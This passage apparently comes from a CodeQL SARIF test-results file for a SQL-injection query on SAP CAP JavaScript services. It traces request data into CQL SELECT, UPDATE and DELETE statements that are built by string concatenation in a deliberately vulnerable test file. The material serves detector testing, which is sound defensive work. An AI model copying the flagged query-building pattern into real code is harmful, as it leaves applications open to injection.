value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":145,"startColumn":13,"endColumn":58}}}],"partialFingerprints":{"primaryLocationLineHash":"d28f5758e8f2b020:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":143,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":143,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":143,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":145,"startColumn":55,"endColumn":57}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":145,"startColumn":47,"endColumn":57}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":145,"startColumn":13,"endColumn":58}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":145,"startColumn":7,"endColumn":58}},"message":{"text":"await S ... \" + id)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":143,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":143,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":145,"startColumn":7,"endColumn":58}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":151,"startColumn":13,"endColumn":58}}}],"partialFingerprints":{"primaryLocationLineHash":"39e9cbf3cbd9ae3c:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":149,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":149,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":149,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":151,"startColumn":55,"endColumn":57}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":151,"startColumn":47,"endColumn":57}},"message":{"text":"`ID=` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":151,"startColumn":13,"endColumn":58}},"message":{"text":"SELECT. ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":151,"startColumn":7,"endColumn":58}},"message":{"text":"await S ... ` + id)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":149,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":149,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":151,"startColumn":7,"endColumn":58}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":157,"startColumn":13,"endColumn":58}}}],"partialFingerprints":{"primaryLocationLineHash":"b86271478f0d53f6:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":155,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":155,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":155,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":157,"startColumn":53,"endColumn":55}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":157,"startColumn":47,"endColumn":57}},"message":{"text":"`ID=${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":157,"startColumn":13,"endColumn":58}},"message":{"text":"SELECT. ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":157,"startColumn":7,"endColumn":58}},"message":{"text":"await S ... ${id}`)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":155,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":155,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":157,"startColumn":7,"endColumn":58}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":13,"endColumn":88}}}],"partialFingerprints":{"primaryLocationLineHash":"12cb305ba21e438f:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":66,"endColumn":68}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":47,"endColumn":68}},"message":{"text":"\"col1 = ...  \" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":13,"endColumn":88}},"message":{"text":"UPDATE. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":7,"endColumn":88}},"message":{"text":"await U ... \" + id)"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":85,"endColumn":87}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":76,"endColumn":87}},"message":{"text":"\"ID =\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":13,"endColumn":88}},"message":{"text":"UPDATE. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":7,"endColumn":88}},"message":{"text":"await U ... \" + id)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":185,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":187,"startColumn":7,"endColumn":88}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":13,"endColumn":88}}}],"partialFingerprints":{"primaryLocationLineHash":"16a5323b901d361b:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":66,"endColumn":68}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":47,"endColumn":68}},"message":{"text":"\"col1 = ...  \" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":13,"endColumn":88}},"message":{"text":"UPDATE. ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":7,"endColumn":88}},"message":{"text":"await U ... ` + id)"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":85,"endColumn":87}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":76,"endColumn":87}},"message":{"text":"`ID =` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":13,"endColumn":88}},"message":{"text":"UPDATE. ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":7,"endColumn":88}},"message":{"text":"await U ... ` + id)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":191,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":193,"startColumn":7,"endColumn":88}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":13,"endColumn":89}}}],"partialFingerprints":{"primaryLocationLineHash":"ec3b26f51764a997:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":66,"endColumn":68}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":47,"endColumn":68}},"message":{"text":"\"col1 = ...  \" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":13,"endColumn":89}},"message":{"text":"UPDATE. ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":7,"endColumn":89}},"message":{"text":"await U ... ${id}`)"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":84,"endColumn":86}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":76,"endColumn":88}},"message":{"text":"`ID = ${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":13,"endColumn":89}},"message":{"text":"UPDATE. ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":7,"endColumn":89}},"message":{"text":"await U ... ${id}`)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":197,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":199,"startColumn":7,"endColumn":89}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":205,"startColumn":13,"endColumn":87}}}],"partialFingerprints":{"primaryLocationLineHash":"1ab4a8658ea07927:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":203,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":203,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":203,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":205,"startColumn":66,"endColumn":68}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":205,"startColumn":47,"endColumn":68}},"message":{"text":"\"col1 = ...  \" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":205,"startColumn":13,"endColumn":87}},"message":{"text":"UPDATE. ...  ${id}`"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":205,"startColumn":7,"endColumn":87}},"message":{"text":"await U ...  ${id}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":203,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":203,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":205,"startColumn":7,"endColumn":87}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":229,"startColumn":13,"endColumn":59}}}],"partialFingerprints":{"primaryLocationLineHash":"c191f9b82574b477:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":227,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":227,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":227,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":229,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":229,"startColumn":47,"endColumn":58}},"message":{"text":"\"ID =\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":229,"startColumn":13,"endColumn":59}},"message":{"text":"DELETE. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":229,"startColumn":7,"endColumn":59}},"message":{"text":"await D ... \" + 